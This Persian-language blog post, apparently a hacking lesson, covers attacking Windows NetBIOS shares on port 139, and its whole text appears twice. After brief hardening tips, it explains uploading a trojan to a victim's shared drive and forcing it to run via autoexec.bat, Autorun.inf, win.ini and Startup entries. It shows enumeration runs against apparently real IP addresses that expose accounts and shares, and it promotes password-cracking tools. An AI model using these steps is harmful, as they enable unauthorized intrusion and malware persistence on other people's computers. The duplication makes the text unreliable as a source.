- خلاصه درس: در این درس نکات دیگری راجع به پورت ۱۳۹ میآموزیم.
◊ چگونه NetBIOS را روی کامپیوتر خودمان فعال یا غیر فعال کنیم؟
برای غیرفعال کردن NetBIOS در ویندوز با توجه به نوع آن ویندوز روشهای مختلفی هست. جدول پایینی برای همین موضوع طراحی شده است:
Win 2000
Win XP Home
Win XP Professional
Start > Programs > Administrative Tools > Local Security Settings > Local Policies > Security Options > Additional restrictions of anonymous connections > Local policy setting > "No access without explicit anonymous permissions" > Ok
Start > Programs > Administrative Tools > Local Security Settings > Local Policies >
1) Network Access: Do not allow anonymous enumeration of SAM accounts: Enabled
2) Network Access: Do not allow anonymous enumeration of SAM accounts and shares: Enabled
Start > Run > regedit > HKEY_LOCAL_MACHINE > HKEY_LOCAL_MACHINE > SYSTEM > CurrentControlSet > Control > LSA > RestrictAnonymous=2
میتونید به کمک فایروال یا روتر پورتهای زیر را ببندید:
135 TCP DCE/RPC Portmapper
137 TCP/UDP NetBIOS Name Service
138 TCP/UDP NetBIOS Datagram Service
139 TCP NetBIOS Session Service
445 TCP Microsoft-DS (Windows 2000 CIFS/SMB)
۱- وقتی پورت ۱۳۹ رو میبندید، دیگه نمیتونید از NetBIOS استفاده کنید ( مگر اینکه دوباره پورت رو به صورت فعال در آورید). پس وقتی که کسی رو میخواهید هک کنید، نیاز دارید که برای مدت کوتاهی دوباره پورت رو فعال کنید.
۲- میبینید که مثلا برای ویندوز ۲۰۰۰ به سه روش کار کنید، در این جدول فقط کافی است یکی رو اعمال کنید.
۳- اگه بعد از غیر فعال کردن، دوباره بخواهید فعال کنید، در مرحله آخر هر یک از روشهای بالا، گزینهای که مخالف گزینه ذکر شده در جدول است رو انتخاب کنید، مثلا اگه در جدول Enabled را نوشتهایم، شما Disable را انتخاب کنید.
◊ چگونه از این امکانات به اشتراک گذاشتن، برای اجرای یک تروجان روی کامپیوتر قربانی استفاده کنیم؟
خوب ما هنوز طریقه استفاده از تروجان رو یاد نگرفتیم ولی سعی میکنم تو یکی از درسهای آینده اونو توضیح بدم. ما اینجا میخواهیم از تروجان در رابطه با پورت ۱۳۹ استفاده کنیم. حالا سوال این است که تروجان (trojan) چیست؟
تروجان بهطور ساده برنامهای اجرایی است، که ما برای طرف مقابل میفرستیم و اگه طرف مقابل اونو اجرا کنه، ما میتونیم کنترل سیستم اونو به دست بیاریم. تا اینجا کافی است فعلا ولی بعدا بیشتر توضیح میدم.
حالا همان بحث تروجان ولی در رابطه با پورت ۱۳۹ :
روش کار به این صورت است که فرضا من الان تونستم یک درایو رو از یک کامپیوتر با پورت باز Share کنم. حالا فایل تروجان ( سرور تروجان ) را upload میکنم به اون کامپیوتر و اسمی براش انتخاب میکنم که طرف مقابل رو به اجرای فایل تشویق کنه. یک اشتباهی که بعضیها میکنند اینه که بعد از کپی کردن تروجان در کامپیوتر هدف، خود هکر میآد و فایل رو دابل کلیک میکنه، در این حالت تروجان روی کامپیوتر خودمون (هکر) اجرا میشه نه کامپیوتر قربانی. پس ما فقط فایل رو میفرستیم و منتظر میمونیم که طرف مقابل اجرا کنه.
حالا چند روش رو مطرح میکنم که در شرایط خاص حالتی رو ایجاد میکنه که نیازی با دابلکلیک توسط قربانی نباشد:
۱- اگه به درایو C کامپیوتر مقابل دسترسی دارید، یک سطر به فایل autoexec.bat اضافه کنید که نام و مسیر فایل اجرایی را در اون سطر بنویسید. مثلا اگه اسم تروجان ali.exe باشد و در مسیر d:\newfolder باشد، سطری که اضافه میکنیم به صورت زیر است:
d:\newfolder\ali.exe
در این حالت به محض اولین restart کامپیوتر، تروجان اجرا خواهد شد.
۲- اگه به درایو C دسترسی دارید، میتونید فایلی به اسم Autorun.inf ایجاد کنید و دستورات زیر را بنویسید ( سطر آخر مطابق با همان تروجان فرضی که در مثال قبل گفتیم، نوشته شده است، اونو با توجه به اسم تروجان و مسیر اون تغییر دهید) :
[autorun]
open=d:\newfolder\ali.exe
۳- اگه به فولدر ویندوز دسترسی دارید، میتونید یک سطر مثل همان مثال قبل ولی برای فایل winstart.bat اجرا کنید. در این حالت هم به محض restart اجرا خواهد شد.
۴- اگه به فولدر ویندوز دسترسی دارید، در فایل win.ini و بعد از قسمتی که [windows] نوشته، این سطر رو اضافه کنید:
run=d:\newfolder\ali.exe
۵- اگه به فولدر ویندوز دسترسی دارید، میتونید تروجان رو به فولدر Start Menu\Startup اضافه کنید. در این حالت نیازی به ویرایش هیچ فایل دیگری نیست.
◊ ابزارهای کمکی: ۱- ابزارهای خط فرمانی
۱- enum :
این برنامه را از اینجا داونلود کنید. enum نرمافزاری با قابلیتهای فوقالعاده است. از جمله تواناییهایی که دارد، در مواردی است که کامپیوتر طرف مقابل برای اعمال sharing از ما پسورد بخواد. در این موارد میتونیم به کمک enum و لیستی از پسوردهایی که در یک فایل ذخیره شده، تعداد زیادی پسورد رو چک کنیم ( اصطلاحا cracking ) و شاید به نتیجه برسیم. ( این موضوع را بعدا بیشتر توضیح مبدم) کاربردی که الان مد نظر ماست، پیدا کردن لیست share هایی است که کامپیوتر مقابل برای ما باز گذاشته است. مثلا من دستور زیر را تایپ کردم، تا لیست اشتراکهای آن ip خاص در آن لحظه رو بدست بیارم:
enum -S 217.218.84.29
و جواب شنیدم:
server: 217.218.84.29
setting up session... success.
enumerating shares (pass 1)... got 10 shares, 0 left:
E$ IPC$ D$ print$ SharedDocs F$ Printer2 ADMIN$ C$ Printer
cleaning up... success.
ملاحظه میفرمایید که درایوهای E و D و F و C و نیز SharedDocs و ... لیست شده است. بقیه مراحل مثل درس ۲۱ است. (دقت کنید که در این حالت نیازی به null session نیست ).
۲- nbtscan :
این برنامه را از اینجا داونلود کنید. این برنامه دقیقا معادل nbtstat است ولی با این تفاوت که میتونه تعداد زیادی ip رو همزمان تست کنه و لیست share ها رو بدست بیاره. این دقیقا راهحلی است برای سوالی که خیلی از شما دوستان پرسیده بودین. مثلا اگه بنویسم:
nbtscan -v -s : 195.219.49.0-30
که لیست اشتراکها رو از ip شماره 195.219.49.0 تا 195.219.49.30 بدست میاره. جواب میشنوم:
195.219.49.1 Recvfrom failed: Connection reset by peer
195.219.49.5 Recvfrom failed: Connection reset by peer
195.219.49.6 Recvfrom failed: Connection reset by peer
195.219.49.7 Recvfrom failed: Connection reset by peer
195.219.49.8 Recvfrom failed: Connection reset by peer
195.219.49.12 Recvfrom failed: Connection reset by peer
195.219.49.23:MRS.ZADE :00U
195.219.49.23:ATINET_MRA :00G
195.219.49.23:MRS.ZADE :03U
195.219.49.23:MAC:44-45-53-54-00-00
195.219.49.28:MAC:44-45-53-54-00-00
195.219.49.26:KIYARASH-R96L0K:00U
195.219.49.26:KIYARASH-R96L0K:20U
195.219.49.26:WORKGROUP :00G
195.219.49.26:WORKGROUP :1eG
195.219.49.26:MAC:00-53-45-00-00-00
195.219.49.22:FARHANG-ZCT780D:00U
195.219.49.22:FARHANG-ZCT780D:20U
195.219.49.22:WORKGROUP :00G
195.219.49.22:WORKGROUP :1eG
195.219.49.22:MAC:00-53-45-00-00-00
195.219.49.29:TESSA :00U
195.219.49.29:WORKGROUP :00G
195.219.49.29:TESSA :03U
195.219.49.29:MAC:44-45-53-54-00-00
195.219.49.25:MAC:44-45-53-54-00-00
در مورد ip هایی که 20U را میبینید، یعنی sharing رو میشه استفاده کرد.
۳- winfo :
اینم از جمله برنامههایی است که باید بگم آخر برنامه است!! از اینجا داونلود کنید. البته توانایی تست تعداد زیادی ip رو نداره ولی وقتی یه ip رو تست میکنه همهچی شو در رو میکنه. (البته میشه گفت همه این کارها رو میشه با enum هم انجام داد ). مثلا من دستور زیر را تایپ کردم :
winfo 195.219.49.184 -n -v
و به نتایج زیر رسیدم:
Winfo 2.0 - copyright (c) 1999-2003, Arne Vidstrom
- http://www.ntsecurity.nu/toolbox/winfo/
Trying to establish null session...
Null session established.
SYSTEM INFORMATION:
- OS version: 4.0
DOMAIN INFORMATION:
- Primary domain (legacy): DSG
- Account domain: TEHRAN
Warning: Unable to retrieve domain DNS information.
Reason : Not supported by the remote OS.
PASSWORD POLICY:
- Time between end of logon time and forced logoff: No forced logoff
- Maximum password age: 42 days
- Minimum password age: 0 days
- Password history length: 0 passwords
- Minimum password length: 0 characters
LOCOUT POLICY:
- Lockout duration: 30 minutes
- Reset lockout counter after 30 minutes
- Lockout threshold: 0
SESSIONS:
- Computer: ARTAWILL-V0P1QR
- User:
LOGGED IN USERS:
* Administrator
USER ACCOUNTS:
* Administrator
- Password age: 666 days
- Privilege level: Administrator
- Home directory:
- Home directory mapped as:
- Comment: Built-in account for administering the computer/domain
- Account is: Enabled
- User can change password: Yes
- Account is locked out: No
- Password never expires: Yes
- The account is: Normal user
- Logon script path:
- Full name:
- User comment:
- Can log in from workstations: All
- Last logon to this DC / computer: Mon Mar 03 23:10:23 2003
- Last logoff from this DC / computer: Tue Dec 11 23:57:37 2001
- Account expires: Never
- Max disk space: Unlimited
- Failed logins in a row to this DC / computer: 0
- Path to user profile:
- Password has expired: No
(This account is the built-in administrator account)
* Guest
- Password age: 680 days
- Privilege level: Guest
- Home directory:
- Home directory mapped as:
- Comment: Built-in account for guest access to the computer/domain
- Account is: Disabled
- User can change password: No
- Account is locked out: No
- Password never expires: Yes
- The account is: Normal user
- Logon script path:
- Full name:
- User comment:
- Can log in from workstations: All
- Last logon to this DC / computer: None
- Last logon to this DC / computer: None
- Account expires: Never
- Max disk space: Unlimited
- Failed logins in a row to this DC / computer: 0
- Path to user profile:
- Password has expired: No
(This account is the built-in guest account)
* TEST
- Password age: 680 days
- Privilege level: User
- Home directory:
- Home directory mapped as:
- Comment:
- Account is: Enabled
- User can change password: Yes
- Account is locked out: No
- Password never expires: No
- The account is: Normal user
- Logon script path:
- Full name:
- User comment:
- Can log in from workstations: All
- Last logon to this DC / computer: None
- Last logon to this DC / computer: None
- Account expires: Never
- Max disk space: Unlimited
- Failed logins in a row to this DC / computer: 0
- Path to user profile:
- Password has expired: Yes
WORKSTATION TRUST ACCOUNTS:
INTERDOMAIN TRUST ACCOUNTS:
SERVER TRUST ACCOUNTS:
SHARES:
* ADMIN$
- Type: Special share reserved for IPC or administrative share
- Remark: Remote Admin
* IPC$
- Type: Unknown
- Remark: Remote IPC
* C$
- Type: Special share reserved for IPC or administrative share
- Remark: Default share
بعدا سعی خواهم کرد که در مورد تک تک اینها بحث کنم براتون. ولی به عنوان مثال در آخرها میتونین، share ها رو ببینید.
۴- NAT :
این برنامه را از اینجا داونلود کنید. یکی از مهمترین کاربردهای اون crack کردن پسورد sharing است ( مثل enum ). برای کار با NAT کافی است، بنویسید nat و بعد یک فاصله و بعد ip را مینویسیم. حتما تست کنید و نتیجه رو ببینید... ( تکلیف برای خودتون )
۵- و ...
◊ ابزارهای کمکی: ۲- ابزارهای گرافیکی
۱- netbrute :
این برنامه را از اینجا داونلود کنید. من از بین ابزارهای گرافیکی اینو توصیه میکنم اگرچه به اندازه دو نرمافزار بعدی مشهور نیست. من نمیخوام روش کار با اینو توضیح بدم چون خیلی تابلو ه! ضمنا این نرمافزار داخل خودش یک پورت اسکنر هم داره که خیلی به درد میخوره. حتما حتما حتما داونلود کنید اینو و اونقدر انگولکش کنید که سر در بیارین ازش. قرار نیست که همیچی رو من بهتون بگم !!
۲- Legion :
اگه بگم مشهورترین نرمافزار اسکن کردن پورت ۱۳۹ این نرمافزاره، سخن گزافی نیست!! خیلیها کشته مرده اون هستن ولی من زیاد ازش خوشم نمیآد. اما باید قبول کرد که کارش واقعا عالیه!!! به هر حال اگه خواستین داوللود کنید، اینجا رو کلیک کنید.
۳- DumpSec یا DumpACL :
این هم خیلی معروفه. اگه خواستین میتونین از اینجا داونلود کنید.
◊ آیا چیز دیگهای راجع به این پورت مونده که بحث نشده باشد؟
بله!
۱- یه نرمافزاری هست به اسم pqwak که اینطوری که میگن، اگه کامپیوتر مقابل ویندوز ۹۸ باشه، میتونه پسورد اونو سه سوت در بیاره. ( این برنامه از نقطه ضعف ویندوز ۹۸ راجع به netbios استفاده میکنه و اونو exploit میکنه) چون من درسم راجع به هک کردن سرورهاست و نه کلاینت، پس نباید زیاد به درد ما بخوره ( توجه کنید که ویندوز ۹۸ تو کار کلاینتاش هم مونده، چه برسه به اینکه سرور باشه! ). خودتون بگردین و اونو اگه میخواین پیدا کنید.
۲- ما بحث استفاده از نقاط ضعف پورتها رو هنوز شروع نکردهایم و در مورد پورت ۱۳۹ هم همینطوره. به عنوان مثال روشهایی هست که پورت ۱۳۹ رو exploit کنیم و اون مراحلی که توش گیر میکردیم رو دور بزنیم.
۳- نکته آخر راجع به این پورت اینه که مواظب خودتون باشین. حتما ورزش کنین. سیگار نکشین چون برای سلامتی خیلی بده! ( قابل توجه بعضیها) حرف بابا مامانتون رو گوش کنین. اگه کنکور دارین با اینکه دارین مشروط میشین، بهجای هک کردن برین درس بخونین! همینها... باقی بقایت، جانم فدایت ...
◊ چگونه NetBIOS را روی کامپیوتر خودمان فعال یا غیر فعال کنیم؟
برای غیرفعال کردن NetBIOS در ویندوز با توجه به نوع آن ویندوز روشهای مختلفی هست. جدول پایینی برای همین موضوع طراحی شده است:
Win 2000
Win XP Home
Win XP Professional
Start > Programs > Administrative Tools > Local Security Settings > Local Policies > Security Options > Additional restrictions of anonymous connections > Local policy setting > "No access without explicit anonymous permissions" > Ok
Start > Programs > Administrative Tools > Local Security Settings > Local Policies >
1) Network Access: Do not allow anonymous enumeration of SAM accounts: Enabled
2) Network Access: Do not allow anonymous enumeration of SAM accounts and shares: Enabled
Start > Run > regedit > HKEY_LOCAL_MACHINE > HKEY_LOCAL_MACHINE > SYSTEM > CurrentControlSet > Control > LSA > RestrictAnonymous=2
میتونید به کمک فایروال یا روتر پورتهای زیر را ببندید:
135 TCP DCE/RPC Portmapper
137 TCP/UDP NetBIOS Name Service
138 TCP/UDP NetBIOS Datagram Service
139 TCP NetBIOS Session Service
445 TCP Microsoft-DS (Windows 2000 CIFS/SMB)
۱- وقتی پورت ۱۳۹ رو میبندید، دیگه نمیتونید از NetBIOS استفاده کنید ( مگر اینکه دوباره پورت رو به صورت فعال در آورید). پس وقتی که کسی رو میخواهید هک کنید، نیاز دارید که برای مدت کوتاهی دوباره پورت رو فعال کنید.
۲- میبینید که مثلا برای ویندوز ۲۰۰۰ به سه روش کار کنید، در این جدول فقط کافی است یکی رو اعمال کنید.
۳- اگه بعد از غیر فعال کردن، دوباره بخواهید فعال کنید، در مرحله آخر هر یک از روشهای بالا، گزینهای که مخالف گزینه ذکر شده در جدول است رو انتخاب کنید، مثلا اگه در جدول Enabled را نوشتهایم، شما Disable را انتخاب کنید.
◊ چگونه از این امکانات به اشتراک گذاشتن، برای اجرای یک تروجان روی کامپیوتر قربانی استفاده کنیم؟
خوب ما هنوز طریقه استفاده از تروجان رو یاد نگرفتیم ولی سعی میکنم تو یکی از درسهای آینده اونو توضیح بدم. ما اینجا میخواهیم از تروجان در رابطه با پورت ۱۳۹ استفاده کنیم. حالا سوال این است که تروجان (trojan) چیست؟
تروجان بهطور ساده برنامهای اجرایی است، که ما برای طرف مقابل میفرستیم و اگه طرف مقابل اونو اجرا کنه، ما میتونیم کنترل سیستم اونو به دست بیاریم. تا اینجا کافی است فعلا ولی بعدا بیشتر توضیح میدم.
حالا همان بحث تروجان ولی در رابطه با پورت ۱۳۹ :
روش کار به این صورت است که فرضا من الان تونستم یک درایو رو از یک کامپیوتر با پورت باز Share کنم. حالا فایل تروجان ( سرور تروجان ) را upload میکنم به اون کامپیوتر و اسمی براش انتخاب میکنم که طرف مقابل رو به اجرای فایل تشویق کنه. یک اشتباهی که بعضیها میکنند اینه که بعد از کپی کردن تروجان در کامپیوتر هدف، خود هکر میآد و فایل رو دابل کلیک میکنه، در این حالت تروجان روی کامپیوتر خودمون (هکر) اجرا میشه نه کامپیوتر قربانی. پس ما فقط فایل رو میفرستیم و منتظر میمونیم که طرف مقابل اجرا کنه.
حالا چند روش رو مطرح میکنم که در شرایط خاص حالتی رو ایجاد میکنه که نیازی با دابلکلیک توسط قربانی نباشد:
۱- اگه به درایو C کامپیوتر مقابل دسترسی دارید، یک سطر به فایل autoexec.bat اضافه کنید که نام و مسیر فایل اجرایی را در اون سطر بنویسید. مثلا اگه اسم تروجان ali.exe باشد و در مسیر d:\newfolder باشد، سطری که اضافه میکنیم به صورت زیر است:
d:\newfolder\ali.exe
در این حالت به محض اولین restart کامپیوتر، تروجان اجرا خواهد شد.
۲- اگه به درایو C دسترسی دارید، میتونید فایلی به اسم Autorun.inf ایجاد کنید و دستورات زیر را بنویسید ( سطر آخر مطابق با همان تروجان فرضی که در مثال قبل گفتیم، نوشته شده است، اونو با توجه به اسم تروجان و مسیر اون تغییر دهید) :
[autorun]
open=d:\newfolder\ali.exe
۳- اگه به فولدر ویندوز دسترسی دارید، میتونید یک سطر مثل همان مثال قبل ولی برای فایل winstart.bat اجرا کنید. در این حالت هم به محض restart اجرا خواهد شد.
۴- اگه به فولدر ویندوز دسترسی دارید، در فایل win.ini و بعد از قسمتی که [windows] نوشته، این سطر رو اضافه کنید:
run=d:\newfolder\ali.exe
۵- اگه به فولدر ویندوز دسترسی دارید، میتونید تروجان رو به فولدر Start Menu\Startup اضافه کنید. در این حالت نیازی به ویرایش هیچ فایل دیگری نیست.
◊ ابزارهای کمکی: ۱- ابزارهای خط فرمانی
۱- enum :
این برنامه را از اینجا داونلود کنید. enum نرمافزاری با قابلیتهای فوقالعاده است. از جمله تواناییهایی که دارد، در مواردی است که کامپیوتر طرف مقابل برای اعمال sharing از ما پسورد بخواد. در این موارد میتونیم به کمک enum و لیستی از پسوردهایی که در یک فایل ذخیره شده، تعداد زیادی پسورد رو چک کنیم ( اصطلاحا cracking ) و شاید به نتیجه برسیم. ( این موضوع را بعدا بیشتر توضیح مبدم) کاربردی که الان مد نظر ماست، پیدا کردن لیست share هایی است که کامپیوتر مقابل برای ما باز گذاشته است. مثلا من دستور زیر را تایپ کردم، تا لیست اشتراکهای آن ip خاص در آن لحظه رو بدست بیارم:
enum -S 217.218.84.29
و جواب شنیدم:
server: 217.218.84.29
setting up session... success.
enumerating shares (pass 1)... got 10 shares, 0 left:
E$ IPC$ D$ print$ SharedDocs F$ Printer2 ADMIN$ C$ Printer
cleaning up... success.
ملاحظه میفرمایید که درایوهای E و D و F و C و نیز SharedDocs و ... لیست شده است. بقیه مراحل مثل درس ۲۱ است. (دقت کنید که در این حالت نیازی به null session نیست ).
۲- nbtscan :
این برنامه را از اینجا داونلود کنید. این برنامه دقیقا معادل nbtstat است ولی با این تفاوت که میتونه تعداد زیادی ip رو همزمان تست کنه و لیست share ها رو بدست بیاره. این دقیقا راهحلی است برای سوالی که خیلی از شما دوستان پرسیده بودین. مثلا اگه بنویسم:
nbtscan -v -s : 195.219.49.0-30
که لیست اشتراکها رو از ip شماره 195.219.49.0 تا 195.219.49.30 بدست میاره. جواب میشنوم:
195.219.49.1 Recvfrom failed: Connection reset by peer
195.219.49.5 Recvfrom failed: Connection reset by peer
195.219.49.6 Recvfrom failed: Connection reset by peer
195.219.49.7 Recvfrom failed: Connection reset by peer
195.219.49.8 Recvfrom failed: Connection reset by peer
195.219.49.12 Recvfrom failed: Connection reset by peer
195.219.49.23:MRS.ZADE :00U
195.219.49.23:ATINET_MRA :00G
195.219.49.23:MRS.ZADE :03U
195.219.49.23:MAC:44-45-53-54-00-00
195.219.49.28:MAC:44-45-53-54-00-00
195.219.49.26:KIYARASH-R96L0K:00U
195.219.49.26:KIYARASH-R96L0K:20U
195.219.49.26:WORKGROUP :00G
195.219.49.26:WORKGROUP :1eG
195.219.49.26:MAC:00-53-45-00-00-00
195.219.49.22:FARHANG-ZCT780D:00U
195.219.49.22:FARHANG-ZCT780D:20U
195.219.49.22:WORKGROUP :00G
195.219.49.22:WORKGROUP :1eG
195.219.49.22:MAC:00-53-45-00-00-00
195.219.49.29:TESSA :00U
195.219.49.29:WORKGROUP :00G
195.219.49.29:TESSA :03U
195.219.49.29:MAC:44-45-53-54-00-00
195.219.49.25:MAC:44-45-53-54-00-00
در مورد ip هایی که 20U را میبینید، یعنی sharing رو میشه استفاده کرد.
۳- winfo :
اینم از جمله برنامههایی است که باید بگم آخر برنامه است!! از اینجا داونلود کنید. البته توانایی تست تعداد زیادی ip رو نداره ولی وقتی یه ip رو تست میکنه همهچی شو در رو میکنه. (البته میشه گفت همه این کارها رو میشه با enum هم انجام داد ). مثلا من دستور زیر را تایپ کردم :
winfo 195.219.49.184 -n -v
و به نتایج زیر رسیدم:
Winfo 2.0 - copyright (c) 1999-2003, Arne Vidstrom
- http://www.ntsecurity.nu/toolbox/winfo/
Trying to establish null session...
Null session established.
SYSTEM INFORMATION:
- OS version: 4.0
DOMAIN INFORMATION:
- Primary domain (legacy): DSG
- Account domain: TEHRAN
Warning: Unable to retrieve domain DNS information.
Reason : Not supported by the remote OS.
PASSWORD POLICY:
- Time between end of logon time and forced logoff: No forced logoff
- Maximum password age: 42 days
- Minimum password age: 0 days
- Password history length: 0 passwords
- Minimum password length: 0 characters
LOCOUT POLICY:
- Lockout duration: 30 minutes
- Reset lockout counter after 30 minutes
- Lockout threshold: 0
SESSIONS:
- Computer: ARTAWILL-V0P1QR
- User:
LOGGED IN USERS:
* Administrator
USER ACCOUNTS:
* Administrator
- Password age: 666 days
- Privilege level: Administrator
- Home directory:
- Home directory mapped as:
- Comment: Built-in account for administering the computer/domain
- Account is: Enabled
- User can change password: Yes
- Account is locked out: No
- Password never expires: Yes
- The account is: Normal user
- Logon script path:
- Full name:
- User comment:
- Can log in from workstations: All
- Last logon to this DC / computer: Mon Mar 03 23:10:23 2003
- Last logoff from this DC / computer: Tue Dec 11 23:57:37 2001
- Account expires: Never
- Max disk space: Unlimited
- Failed logins in a row to this DC / computer: 0
- Path to user profile:
- Password has expired: No
(This account is the built-in administrator account)
* Guest
- Password age: 680 days
- Privilege level: Guest
- Home directory:
- Home directory mapped as:
- Comment: Built-in account for guest access to the computer/domain
- Account is: Disabled
- User can change password: No
- Account is locked out: No
- Password never expires: Yes
- The account is: Normal user
- Logon script path:
- Full name:
- User comment:
- Can log in from workstations: All
- Last logon to this DC / computer: None
- Last logon to this DC / computer: None
- Account expires: Never
- Max disk space: Unlimited
- Failed logins in a row to this DC / computer: 0
- Path to user profile:
- Password has expired: No
(This account is the built-in guest account)
* TEST
- Password age: 680 days
- Privilege level: User
- Home directory:
- Home directory mapped as:
- Comment:
- Account is: Enabled
- User can change password: Yes
- Account is locked out: No
- Password never expires: No
- The account is: Normal user
- Logon script path:
- Full name:
- User comment:
- Can log in from workstations: All
- Last logon to this DC / computer: None
- Last logon to this DC / computer: None
- Account expires: Never
- Max disk space: Unlimited
- Failed logins in a row to this DC / computer: 0
- Path to user profile:
- Password has expired: Yes
WORKSTATION TRUST ACCOUNTS:
INTERDOMAIN TRUST ACCOUNTS:
SERVER TRUST ACCOUNTS:
SHARES:
* ADMIN$
- Type: Special share reserved for IPC or administrative share
- Remark: Remote Admin
* IPC$
- Type: Unknown
- Remark: Remote IPC
* C$
- Type: Special share reserved for IPC or administrative share
- Remark: Default share
بعدا سعی خواهم کرد که در مورد تک تک اینها بحث کنم براتون. ولی به عنوان مثال در آخرها میتونین، share ها رو ببینید.
۴- NAT :
این برنامه را از اینجا داونلود کنید. یکی از مهمترین کاربردهای اون crack کردن پسورد sharing است ( مثل enum ). برای کار با NAT کافی است، بنویسید nat و بعد یک فاصله و بعد ip را مینویسیم. حتما تست کنید و نتیجه رو ببینید... ( تکلیف برای خودتون )
۵- و ...
◊ ابزارهای کمکی: ۲- ابزارهای گرافیکی
۱- netbrute :
این برنامه را از اینجا داونلود کنید. من از بین ابزارهای گرافیکی اینو توصیه میکنم اگرچه به اندازه دو نرمافزار بعدی مشهور نیست. من نمیخوام روش کار با اینو توضیح بدم چون خیلی تابلو ه! ضمنا این نرمافزار داخل خودش یک پورت اسکنر هم داره که خیلی به درد میخوره. حتما حتما حتما داونلود کنید اینو و اونقدر انگولکش کنید که سر در بیارین ازش. قرار نیست که همیچی رو من بهتون بگم !!
۲- Legion :
اگه بگم مشهورترین نرمافزار اسکن کردن پورت ۱۳۹ این نرمافزاره، سخن گزافی نیست!! خیلیها کشته مرده اون هستن ولی من زیاد ازش خوشم نمیآد. اما باید قبول کرد که کارش واقعا عالیه!!! به هر حال اگه خواستین داوللود کنید، اینجا رو کلیک کنید.
۳- DumpSec یا DumpACL :
این هم خیلی معروفه. اگه خواستین میتونین از اینجا داونلود کنید.
◊ آیا چیز دیگهای راجع به این پورت مونده که بحث نشده باشد؟
بله!
۱- یه نرمافزاری هست به اسم pqwak که اینطوری که میگن، اگه کامپیوتر مقابل ویندوز ۹۸ باشه، میتونه پسورد اونو سه سوت در بیاره. ( این برنامه از نقطه ضعف ویندوز ۹۸ راجع به netbios استفاده میکنه و اونو exploit میکنه) چون من درسم راجع به هک کردن سرورهاست و نه کلاینت، پس نباید زیاد به درد ما بخوره ( توجه کنید که ویندوز ۹۸ تو کار کلاینتاش هم مونده، چه برسه به اینکه سرور باشه! ). خودتون بگردین و اونو اگه میخواین پیدا کنید.
۲- ما بحث استفاده از نقاط ضعف پورتها رو هنوز شروع نکردهایم و در مورد پورت ۱۳۹ هم همینطوره. به عنوان مثال روشهایی هست که پورت ۱۳۹ رو exploit کنیم و اون مراحلی که توش گیر میکردیم رو دور بزنیم.
۳- نکته آخر راجع به این پورت اینه که مواظب خودتون باشین. حتما ورزش کنین. سیگار نکشین چون برای سلامتی خیلی بده! ( قابل توجه بعضیها) حرف بابا مامانتون رو گوش کنین. اگه کنکور دارین با اینکه دارین مشروط میشین، بهجای هک کردن برین درس بخونین! همینها... باقی بقایت، جانم فدایت ...
کوچیک ::: سه شنبه 86/7/24::: ساعت 3:0 صبح
نظرات دیگران: نظر
لیست کل یادداشت های این وبلاگ
>> بازدیدهای وبلاگ <<
بازدید امروز: 4
بازدید دیروز: 1
کل بازدید :31829
بازدید دیروز: 1
کل بازدید :31829
>>اوقات شرعی <<
>> درباره خودم <<
>>لوگوی وبلاگ من<<
>>آرشیو شده ها<<
>>جستجو در وبلاگ<<
جستجو:
>>اشتراک در خبرنامه<<
>>تبلیغات<<